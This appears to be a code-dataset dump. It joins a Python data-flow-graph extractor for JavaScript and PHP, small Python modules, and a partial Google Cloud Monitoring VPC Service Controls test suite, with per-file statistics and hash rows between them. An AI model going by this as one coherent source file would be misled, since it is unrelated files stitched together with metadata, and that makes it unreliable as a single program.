        return sorted(DFG,key=lambda x:x[1]),states
    # --- Generic node: recurse into children ---
    else:
        # do_first_statement is empty for PHP, so the first loop matches
        # nothing and children are processed in source order.
        DFG=[]
        for child in root_node.children:
            if child.type in do_first_statement:
                temp,states=DFG_php(child,index_to_code,states)
                DFG+=temp
        for child in root_node.children:
            if child.type not in do_first_statement:
                temp,states=DFG_php(child,index_to_code,states)
                DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
def DFG_javascript(root_node,index_to_code,states):
    """Extract a data-flow graph (DFG) from a JavaScript parse tree.

    Recursively walks root_node (presumably a tree-sitter node -- TODO
    confirm against the caller) and returns (DFG, states):

    * DFG   -- list of 5-tuples (token_text, token_idx, relation,
               dep_token_texts, dep_token_idxs), relation being
               'comesFrom' or 'computedFrom', sorted by token_idx.
    * states -- dict mapping a variable's source text to the list of
               token indices of its most recent definition(s).

    index_to_code maps a (start_point, end_point) span to
    (token_idx, token_text).
    """
    # Node-type tables driving the dispatch below (JS grammar node names).
    assignment=['assignment_pattern','augmented_assignment_expression']
    def_statement=['variable_declarator']
    increment_statement=['update_expression']
    if_statement=['if_statement','else']
    for_statement=['for_statement']
    enhanced_for_statement=[]  # unused here; kept for parity with sibling DFG_* functions
    while_statement=['while_statement']
    do_first_statement=[]
    # Copy so this recursion level does not mutate the caller's states.
    states=states.copy()
    # --- Leaf token (string literals are treated as a single token) ---
    if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
        idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
        if root_node.type==code:
            # Punctuation/keyword token (its type equals its own text): no data flow.
            return [],states
        elif code in states:
            # Known variable: link this use to its recorded definition sites.
            return [(code,idx,'comesFrom',[code],states[code].copy())],states
        else:
            if root_node.type=='identifier':
                # First sighting of an identifier: record it as its own definition.
                states[code]=[idx]
            return [(code,idx,'comesFrom',[],[])],states
    # --- Variable declarator: name [= value] ---
    elif root_node.type in def_statement:
        name=root_node.child_by_field_name('name')
        value=root_node.child_by_field_name('value')
        DFG=[]
        if value is None:
            # Declaration without initializer: define with no dependencies.
            indexs=tree_to_variable_index(name,index_to_code)
            for index in indexs:
                idx,code=index_to_code[index]
                DFG.append((code,idx,'comesFrom',[],[]))
                states[code]=[idx]
            return sorted(DFG,key=lambda x:x[1]),states
        else:
            # With initializer: every name token comesFrom every value token.
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            temp,states=DFG_javascript(value,index_to_code,states)
            DFG+=temp
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
                states[code1]=[idx1]
            return sorted(DFG,key=lambda x:x[1]),states
    # --- Assignment: left tokens are computedFrom every right token ---
    elif root_node.type in assignment:
        left_nodes=root_node.child_by_field_name('left')
        right_nodes=root_node.child_by_field_name('right')
        DFG=[]
        temp,states=DFG_javascript(right_nodes,index_to_code,states)
        DFG+=temp
        name_indexs=tree_to_variable_index(left_nodes,index_to_code)
        value_indexs=tree_to_variable_index(right_nodes,index_to_code)
        for index1 in name_indexs:
            idx1,code1=index_to_code[index1]
            for index2 in value_indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
            states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- Update expression (x++ / x--): the variable is computedFrom itself ---
    elif root_node.type in increment_statement:
        DFG=[]
        indexs=tree_to_variable_index(root_node,index_to_code)
        for index1 in indexs:
            idx1,code1=index_to_code[index1]
            for index2 in indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
            states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- Branching: process each branch, then merge the branch states ---
    elif root_node.type in if_statement:
        DFG=[]
        current_states=states.copy()
        others_states=[]
        flag=False  # becomes True once the first alternative branch is seen
        tag=False   # True if an 'else' part exists
        if 'else' in root_node.type:
            tag=True
        for child in root_node.children:
            if 'else' in child.type:
                tag=True
            if child.type not in if_statement and flag is False:
                # Condition and first branch: thread current_states through.
                temp,current_states=DFG_javascript(child,index_to_code,current_states)
                DFG+=temp
            else:
                # Alternative branches restart from the incoming states.
                flag=True
                temp,new_states=DFG_javascript(child,index_to_code,states)
                DFG+=temp
                others_states.append(new_states)
        others_states.append(current_states)
        if tag is False:
            # No else: the branch may be skipped entirely, so keep the
            # incoming states as one of the merged possibilities.
            others_states.append(states)
        # Union the definition sites per variable across all branch states.
        new_states={}
        for dic in others_states:
            for key in dic:
                if key not in new_states:
                    new_states[key]=dic[key].copy()
                else:
                    new_states[key]+=dic[key]
        for key in states:
            if key not in new_states:
                new_states[key]=states[key]
            else:
                new_states[key]+=states[key]
        for key in new_states:
            # Deduplicate and order the merged definition sites.
            new_states[key]=sorted(list(set(new_states[key])))
        return sorted(DFG,key=lambda x:x[1]),new_states
    # --- for loop: two passes so iteration i can depend on iteration i-1 ---
    elif root_node.type in for_statement:
        DFG=[]
        for child in root_node.children:
            temp,states=DFG_javascript(child,index_to_code,states)
            DFG+=temp
        # Second pass: re-process everything after the variable_declaration
        # to capture loop-carried dependencies.
        flag=False
        for child in root_node.children:
            if flag:
                temp,states=DFG_javascript(child,index_to_code,states)
                DFG+=temp
            elif child.type=="variable_declaration":
                flag=True
        # Merge duplicate edges produced by the two passes: union the
        # dependency lists of edges sharing (text, idx, relation).
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- while loop: two passes to model loop-carried dependencies ---
    elif root_node.type in while_statement:
        DFG=[]
        for i in range(2):
            for child in root_node.children:
                temp,states=DFG_javascript(child,index_to_code,states)
                DFG+=temp
        # Merge duplicate edges produced by the two passes (same scheme as
        # the for-statement branch above).
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- Generic node: recurse into children ---
    else:
        # do_first_statement is empty here, so the first loop matches
        # nothing and children are processed in source order.
        DFG=[]
        for child in root_node.children:
            if child.type in do_first_statement:
                temp,states=DFG_javascript(child,index_to_code,states)
                DFG+=temp
        for child in root_node.children:
            if child.type not in do_first_statement:
                temp,states=DFG_javascript(child,index_to_code,states)
                DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
| 44.409319
| 143
| 0.561315
| 8,665
| 61,951
| 3.800115
| 0.017426
| 0.060253
| 0.076834
| 0.016156
| 0.960004
| 0.950437
| 0.943878
| 0.934888
| 0.927387
| 0.918762
| 0
| 0.02606
| 0.306872
| 61,951
| 1,394
| 144
| 44.441176
| 0.740778
| 0.037045
| 0
| 0.915332
| 0
| 0
| 0.042347
| 0.004849
| 0
| 0
| 0
| 0
| 0.000763
| 1
| 0.006865
| false
| 0
| 0.001526
| 0
| 0.07704
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9f8d356e865610135fadf784854d97b0eef7c761
| 237
|
py
|
Python
|
2019-06-06-ten-tips-python-web-devs-kennedy/code/top_10_web_explore/ex08_docker/services/movie_svc/routes.py
|
skolbin-ssi/WintellectWebinars
|
63612580c7c2f7d0c6dca930abba5696b2f40286
|
[
"Apache-2.0"
] | 32
|
2019-09-25T07:35:40.000Z
|
2021-03-15T09:15:39.000Z
|
2019-06-06-ten-tips-python-web-devs-kennedy/code/top_10_web_explore/ex08_docker/services/movie_svc/routes.py
|
skolbin-ssi/WintellectWebinars
|
63612580c7c2f7d0c6dca930abba5696b2f40286
|
[
"Apache-2.0"
] | 28
|
2021-03-10T08:24:07.000Z
|
2022-03-02T07:26:39.000Z
|
2019-06-06-ten-tips-python-web-devs-kennedy/code/top_10_web_explore/ex08_docker/services/movie_svc/routes.py
|
skolbin-ssi/WintellectWebinars
|
63612580c7c2f7d0c6dca930abba5696b2f40286
|
[
"Apache-2.0"
] | 8
|
2019-09-25T21:42:04.000Z
|
2021-05-23T13:44:14.000Z
|
# noinspection PyUnresolvedReferences
from app_instance import api
# noinspection PyUnresolvedReferences
from views.api_views import *
# noinspection PyUnresolvedReferences
from views.home import *
api.add_route("/static", static=True)
| 26.333333
| 37
| 0.835443
| 26
| 237
| 7.5
| 0.5
| 0.523077
| 0.584615
| 0.441026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101266
| 237
| 8
| 38
| 29.625
| 0.915493
| 0.451477
| 0
| 0
| 0
| 0
| 0.055556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e26409204e697385e660b80e7d7e5f379eae1afa
| 62
|
py
|
Python
|
__init__.py
|
tanayrastogi/faceDetection
|
7d55ef01d1d35c36b1f11895da6c5e7baceadfbd
|
[
"MIT"
] | null | null | null |
__init__.py
|
tanayrastogi/faceDetection
|
7d55ef01d1d35c36b1f11895da6c5e7baceadfbd
|
[
"MIT"
] | null | null | null |
__init__.py
|
tanayrastogi/faceDetection
|
7d55ef01d1d35c36b1f11895da6c5e7baceadfbd
|
[
"MIT"
] | null | null | null |
from .detection import CaffeModel
from .detection import MTCNN
| 31
| 33
| 0.854839
| 8
| 62
| 6.625
| 0.625
| 0.490566
| 0.716981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112903
| 62
| 2
| 34
| 31
| 0.963636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e2a09c05edbc91c52dfd10914130a348b3f17321
| 145
|
py
|
Python
|
cli_bdd/behave/steps/__init__.py
|
fionn/cli-bdd
|
77852405c571324efca5f7483cd31e94d00a5985
|
[
"MIT"
] | 8
|
2016-05-17T21:32:28.000Z
|
2022-02-12T08:59:59.000Z
|
cli_bdd/behave/steps/__init__.py
|
fionn/cli-bdd
|
77852405c571324efca5f7483cd31e94d00a5985
|
[
"MIT"
] | 7
|
2016-04-24T07:54:07.000Z
|
2020-06-16T15:38:52.000Z
|
cli_bdd/behave/steps/__init__.py
|
fionn/cli-bdd
|
77852405c571324efca5f7483cd31e94d00a5985
|
[
"MIT"
] | 4
|
2018-02-21T11:19:24.000Z
|
2019-06-10T17:53:29.000Z
|
# flake8: noqa
from cli_bdd.behave.steps.environment import *
from cli_bdd.behave.steps.command import *
from cli_bdd.behave.steps.file import *
| 29
| 46
| 0.8
| 23
| 145
| 4.913043
| 0.478261
| 0.185841
| 0.265487
| 0.424779
| 0.663717
| 0.477876
| 0
| 0
| 0
| 0
| 0
| 0.007692
| 0.103448
| 145
| 4
| 47
| 36.25
| 0.861538
| 0.082759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2c54f6d58364389bd08fc0fbf7842886fa81c3f1
| 102
|
py
|
Python
|
hmlf/algorithms/sac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | 1
|
2021-05-05T05:59:55.000Z
|
2021-05-05T05:59:55.000Z
|
hmlf/algorithms/sac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | 1
|
2021-05-18T07:51:46.000Z
|
2021-05-18T07:51:46.000Z
|
hmlf/algorithms/sac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | null | null | null |
from hmlf.algorithms.sac.policies import CnnPolicy, MlpPolicy
from hmlf.algorithms.sac.sac import SAC
| 34
| 61
| 0.843137
| 15
| 102
| 5.733333
| 0.533333
| 0.186047
| 0.418605
| 0.488372
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 102
| 2
| 62
| 51
| 0.924731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e2e1ac7d2581b3ea4526fff99abcfcf773a19e7b
| 27,762
|
py
|
Python
|
tests/system/test_vpcsc_v3.py
|
LaudateCorpus1/python-monitoring
|
412b9fc844b8be1a5c763c02a244c2cbecb8091d
|
[
"Apache-2.0"
] | 18
|
2020-09-19T17:52:47.000Z
|
2022-03-25T12:09:22.000Z
|
tests/system/test_vpcsc_v3.py
|
LaudateCorpus1/python-monitoring
|
412b9fc844b8be1a5c763c02a244c2cbecb8091d
|
[
"Apache-2.0"
] | 110
|
2020-02-05T15:26:47.000Z
|
2022-03-28T23:02:02.000Z
|
tests/system/test_vpcsc_v3.py
|
LaudateCorpus1/python-monitoring
|
412b9fc844b8be1a5c763c02a244c2cbecb8091d
|
[
"Apache-2.0"
] | 26
|
2020-02-08T00:05:46.000Z
|
2022-03-27T19:32:26.000Z
|
# -*- coding: utf-8 -*-
#
# flake8: noqa
#
# DO NOT MODIFY! THIS FILE IS AUTO-GENERATED.
# This file is auto-generated on 11 Oct 19 21:43 UTC.
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
from google.api_core import exceptions
from google.cloud import monitoring_v3
from test_utils.vpcsc_config import vpcsc_config
_VPCSC_PROHIBITED_MESSAGE = "Request is prohibited by organization's policy"
@pytest.fixture(scope="module")
def aps_client():
return monitoring_v3.AlertPolicyServiceClient()
@pytest.fixture(scope="module")
def name_inside(aps_client):
return f"projects/{vpcsc_config.project_inside}"
@pytest.fixture(scope="module")
def name_outside(aps_client):
return f"projects/{vpcsc_config.project_outside}"
@pytest.fixture(scope="module")
def alert_policy_path_inside(aps_client):
alert_policy_id = "mock_alert_policy"
return aps_client.alert_policy_path(vpcsc_config.project_inside, alert_policy_id)
@pytest.fixture(scope="module")
def alert_policy_path_outside(aps_client):
alert_policy_id = "mock_alert_policy"
return aps_client.alert_policy_path(vpcsc_config.project_outside, alert_policy_id)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDAlertPolicies(object):
@staticmethod
def test_create_alert_policy_inside(aps_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
aps_client.create_alert_policy(
request={"name": name_inside, "alert_policy": {}}
)
@staticmethod
def test_create_alert_policy_outside(aps_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
aps_client.create_alert_policy(
request={"name": name_outside, "alert_policy": {}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_alert_policies_inside(aps_client, name_inside):
list(aps_client.list_alert_policies(request={"name": name_inside}))
@staticmethod
def test_list_alert_policies_outside(aps_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(aps_client.list_alert_policies(request={"name": name_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_alert_policy_inside(aps_client, alert_policy_path_inside):
with pytest.raises(exceptions.NotFound): # no perms issue
aps_client.get_alert_policy(request={"name": alert_policy_path_inside})
@staticmethod
def test_get_alert_policy_outside(aps_client, alert_policy_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
aps_client.get_alert_policy(request={"name": alert_policy_path_outside})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_update_alert_policy_inside(aps_client, alert_policy_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
aps_client.update_alert_policy(
request={"alert_policy": {"name": alert_policy_path_inside}}
)
@staticmethod
def test_update_alert_policy_outside(aps_client, alert_policy_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
aps_client.update_alert_policy(
request={"alert_policy": {"name": alert_policy_path_outside}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_delete_alert_policy_inside(aps_client, alert_policy_path_inside):
with pytest.raises(exceptions.NotFound): # no perms issue
aps_client.delete_alert_policy(request={"name": alert_policy_path_inside})
@staticmethod
def test_delete_alert_policy_outside(aps_client, alert_policy_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
aps_client.delete_alert_policy(request={"name": alert_policy_path_outside})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@pytest.fixture(scope="module")
def gs_client():
return monitoring_v3.GroupServiceClient()
@pytest.fixture(scope="module")
def group_path_inside(gs_client):
group_id = "mock_group"
return gs_client.group_path(vpcsc_config.project_inside, group_id)
@pytest.fixture(scope="module")
def group_path_outside(gs_client):
group_id = "mock_group"
return gs_client.group_path(vpcsc_config.project_outside, group_id)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDGroups(object):
@staticmethod
def test_create_group_inside(gs_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
gs_client.create_group(request={"name": name_inside, "group": {}})
@staticmethod
def test_create_group_outside(gs_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
gs_client.create_group(request={"name": name_outside, "group": {}})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_groups_inside(gs_client, name_inside):
list(gs_client.list_groups(request={"name": name_inside}))
@staticmethod
def test_list_groups_outside(gs_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(gs_client.list_groups(request={"name": name_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_group_inside(gs_client, group_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
gs_client.get_group(request={"name": group_path_inside})
@staticmethod
def test_get_group_outside(gs_client, group_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
gs_client.get_group(request={"name": group_path_outside})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_group_members_inside(gs_client, group_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
list(gs_client.list_group_members(request={"name": group_path_inside}))
@staticmethod
def test_list_group_members_outside(gs_client, group_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(gs_client.list_group_members(request={"name": group_path_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_update_group_inside(gs_client, group_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
gs_client.update_group(request={"group": {"name": group_path_inside}})
@staticmethod
def test_update_group_outside(gs_client, group_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
gs_client.update_group(request={"group": {"name": group_path_outside}})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_delete_group_inside(gs_client, group_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
gs_client.delete_group(request={"name": group_path_inside})
@staticmethod
def test_delete_group_outside(gs_client, group_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
gs_client.delete_group(request={"name": group_path_outside})
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@pytest.fixture(scope="module")
def ms_client():
return monitoring_v3.MetricServiceClient()
@pytest.fixture(scope="module")
def metric_descriptor_path_inside(ms_client):
metric_descriptor_id = "mock_metric_descriptor"
return ms_client.metric_descriptor_path(
vpcsc_config.project_inside, metric_descriptor_id
)
@pytest.fixture(scope="module")
def metric_descriptor_path_outside(ms_client):
metric_descriptor_id = "mock_metric_descriptor"
return ms_client.metric_descriptor_path(
vpcsc_config.project_outside, metric_descriptor_id
)
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDMetricDescriptors(object):
@staticmethod
def test_create_metric_descriptor_inside(ms_client, name_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
ms_client.create_metric_descriptor(
request={"name": name_inside, "metric_descriptor": {}}
)
@staticmethod
def test_create_metric_descriptor_outside(ms_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
ms_client.create_metric_descriptor(
request={"name": name_outside, "metric_descriptor": {}}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_list_metric_descriptors_inside(ms_client, name_inside):
list(ms_client.list_metric_descriptors(request={"name": name_inside}))
@staticmethod
def test_list_metric_descriptors_outside(ms_client, name_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
list(ms_client.list_metric_descriptors(request={"name": name_outside}))
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_get_metric_descriptor_inside(ms_client, metric_descriptor_path_inside):
with pytest.raises(exceptions.NotFound): # no perms issue
ms_client.get_metric_descriptor(
request={"name": metric_descriptor_path_inside}
)
@staticmethod
def test_get_metric_descriptor_outside(ms_client, metric_descriptor_path_outside):
with pytest.raises(exceptions.PermissionDenied) as exc:
ms_client.get_metric_descriptor(
request={"name": metric_descriptor_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@staticmethod
def test_delete_metric_descriptor_inside(ms_client, metric_descriptor_path_inside):
with pytest.raises(exceptions.InvalidArgument): # no perms issue
ms_client.delete_metric_descriptor(
request={"name": metric_descriptor_path_inside}
)
@staticmethod
def test_delete_metric_descriptor_outside(
ms_client, metric_descriptor_path_outside
):
with pytest.raises(exceptions.PermissionDenied) as exc:
ms_client.delete_metric_descriptor(
request={"name": metric_descriptor_path_outside}
)
assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDTimeSeries(object):
    """VPC-SC checks for time series RPCs.

    Inside the perimeter, calls fail for non-permission reasons
    (InvalidArgument on the mock payload); outside, the perimeter
    rejects them with PermissionDenied.
    """

    @staticmethod
    def test_create_time_series_inside(ms_client, name_inside):
        req = {"name": name_inside, "time_series": {}}
        # Bad payload, not a permissions problem.
        with pytest.raises(exceptions.InvalidArgument):
            ms_client.create_time_series(request=req)

    @staticmethod
    def test_create_time_series_outside(ms_client, name_outside):
        req = {"name": name_outside, "time_series": {}}
        with pytest.raises(exceptions.PermissionDenied) as excinfo:
            ms_client.create_time_series(request=req)
        assert _VPCSC_PROHIBITED_MESSAGE in excinfo.value.message

    @staticmethod
    def test_list_time_series_inside(ms_client, name_inside):
        req = {
            "name": name_inside,
            "filter": "",
            "interval": {},
            "view": monitoring_v3.ListTimeSeriesRequest.TimeSeriesView.FULL,
        }
        with pytest.raises(exceptions.InvalidArgument):
            list(ms_client.list_time_series(request=req))

    @staticmethod
    def test_list_time_series_outside(ms_client, name_outside):
        req = {
            "name": name_outside,
            "filter": "",
            "interval": {},
            "view": monitoring_v3.ListTimeSeriesRequest.TimeSeriesView.FULL,
        }
        with pytest.raises(exceptions.PermissionDenied) as excinfo:
            list(ms_client.list_time_series(request=req))
        assert _VPCSC_PROHIBITED_MESSAGE in excinfo.value.message
@pytest.fixture(scope="module")
def monitored_resource_descriptor_path_inside(ms_client):
    """Path to a mock monitored resource descriptor in the in-perimeter project."""
    return ms_client.monitored_resource_descriptor_path(
        vpcsc_config.project_inside, "mock_monitored_resource_descriptor"
    )


@pytest.fixture(scope="module")
def monitored_resource_descriptor_path_outside(ms_client):
    """Path to a mock monitored resource descriptor in the out-of-perimeter project."""
    return ms_client.monitored_resource_descriptor_path(
        vpcsc_config.project_outside, "mock_monitored_resource_descriptor"
    )
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDMonitoredResourceDescriptor(object):
    """VPC-SC checks for monitored resource descriptor RPCs."""

    @staticmethod
    def test_list_monitored_resource_descriptors_inside(ms_client, name_inside):
        # Listing inside the perimeter must succeed.
        pager = ms_client.list_monitored_resource_descriptors(
            request={"name": name_inside}
        )
        list(pager)

    @staticmethod
    def test_list_monitored_resource_descriptors_outside(ms_client, name_outside):
        with pytest.raises(exceptions.PermissionDenied) as excinfo:
            pager = ms_client.list_monitored_resource_descriptors(
                request={"name": name_outside}
            )
            list(pager)
        assert _VPCSC_PROHIBITED_MESSAGE in excinfo.value.message

    @staticmethod
    def test_get_monitored_resource_descriptor_inside(
        ms_client, monitored_resource_descriptor_path_inside
    ):
        # NotFound, not PermissionDenied: the call got past the perimeter.
        req = {"name": monitored_resource_descriptor_path_inside}
        with pytest.raises(exceptions.NotFound):
            ms_client.get_monitored_resource_descriptor(request=req)

    @staticmethod
    def test_get_monitored_resource_descriptor_outside(
        ms_client, monitored_resource_descriptor_path_outside
    ):
        req = {"name": monitored_resource_descriptor_path_outside}
        with pytest.raises(exceptions.PermissionDenied) as excinfo:
            ms_client.get_monitored_resource_descriptor(request=req)
        assert _VPCSC_PROHIBITED_MESSAGE in excinfo.value.message
@pytest.fixture(scope="module")
def ncs_client():
    """Module-scoped NotificationChannelServiceClient shared by the tests below."""
    return monitoring_v3.NotificationChannelServiceClient()


@pytest.fixture(scope="module")
def notification_channel_path_inside(ncs_client):
    """Path to a mock notification channel in the in-perimeter project."""
    return ncs_client.notification_channel_path(
        vpcsc_config.project_inside, "mock_notification_channel"
    )


@pytest.fixture(scope="module")
def notification_channel_descriptor_path_inside(ncs_client):
    """Path to a mock notification channel descriptor in the in-perimeter project."""
    return ncs_client.notification_channel_descriptor_path(
        vpcsc_config.project_inside, "mock_notification_channel_descriptor"
    )


@pytest.fixture(scope="module")
def notification_channel_path_outside(ncs_client):
    """Path to a mock notification channel in the out-of-perimeter project."""
    return ncs_client.notification_channel_path(
        vpcsc_config.project_outside, "mock_notification_channel"
    )


@pytest.fixture(scope="module")
def notification_channel_descriptor_path_outside(ncs_client):
    """Path to a mock notification channel descriptor in the out-of-perimeter project."""
    return ncs_client.notification_channel_descriptor_path(
        vpcsc_config.project_outside, "mock_notification_channel_descriptor"
    )
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDNotificationChannels(object):
    """VPC-SC checks for notification channel RPCs.

    Pattern used throughout: for the in-perimeter project the call fails
    with a non-permission error (NotFound/InvalidArgument on mock data),
    proving the perimeter let it through; for the out-of-perimeter project
    it fails with PermissionDenied carrying the VPC-SC prohibition message.
    """

    @staticmethod
    def test_create_notification_channel_inside(ncs_client, name_inside):
        with pytest.raises(exceptions.InvalidArgument):  # no perms issue
            ncs_client.create_notification_channel(
                request={"name": name_inside, "notification_channel": {}}
            )

    @staticmethod
    def test_create_notification_channel_outside(ncs_client, name_outside):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ncs_client.create_notification_channel(
                request={"name": name_outside, "notification_channel": {}}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_list_notification_channels_inside(ncs_client, name_inside):
        # list(...) forces the pager to issue the RPC.
        list(ncs_client.list_notification_channels(request={"name": name_inside}))

    @staticmethod
    def test_list_notification_channels_outside(ncs_client, name_outside):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            list(ncs_client.list_notification_channels(request={"name": name_outside}))
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_get_notification_channel_inside(
        ncs_client, notification_channel_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
